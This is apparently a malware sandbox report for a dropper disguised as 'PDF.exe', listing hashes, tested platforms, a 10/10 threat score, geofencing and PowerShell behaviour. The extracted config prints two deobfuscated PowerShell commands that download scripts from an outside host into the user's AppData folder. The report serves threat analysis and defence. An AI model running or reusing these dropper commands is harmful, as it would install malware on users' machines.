Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

PDF.exe

windows7-x64

10

PDF.exe

windows10-2004-x64

10

PDF.exe

android-9-x86

PDF.exe

android-13-x64

PDF.exe

macos-10.15-amd64

PDF.exe

ubuntu-18.04-amd64

PDF.exe

debian-9-armhf

PDF.exe

debian-9-mips

PDF.exe

debian-9-mipsel

Resubmissions

21/01/2025, 13:31 UTC

250121-qspexswjes 10

21/01/2025, 12:04 UTC

250121-n8tngasrhm 10

13/07/2024, 12:59 UTC

240713-p8a2ss1gpq 10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    PDF.exe

  • Size

    258KB

  • Sample

    250121-n8tngasrhm

  • MD5

    34c2047d0b69ba023b700c21431accc0

  • SHA1

    e34c28611707c81565cb73d8a1a46dfc3ab2495a

  • SHA256

    ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

  • SHA512

    a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7

  • SSDEEP

    6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

Score
10/10
androiddiscoveryexecutionlinklinuxmacospdf

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object net.webclient).downloadfile("http://thelustfactory.com/vns/1.ps1", "C:\\Users\\Admin\\AppData\\Roaming\\1.ps1")
2
URLs
exe.dropper

http://thelustfactory.com/vns/1.ps1

Extracted

Language
ps1
Deobfuscated
1
(new-object net.webclient).downloadfile("http://thelustfactory.com/vns/2.ps1", "C:\\Users\\Admin\\AppData\\Roaming\\2.ps1")
2
URLs
exe.dropper

http://thelustfactory.com/vns/2.ps1

Targets

    • Target

      PDF.exe

    • Size

      258KB

    • MD5

      34c2047d0b69ba023b700c21431accc0

    • SHA1

      e34c28611707c81565cb73d8a1a46dfc3ab2495a

    • SHA256

      ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799

    • SHA512

      a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7

    • SSDEEP

      6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3

    Score
    10/10
    discoveryexecutionlinkpdf

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Command and Scripting Interpreter: PowerShell

      Using powershell.exe command.

      execution
    behavioral1behavioral2behavioral3behavioral4behavioral5behavioral6behavioral7behavioral8behavioral9

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.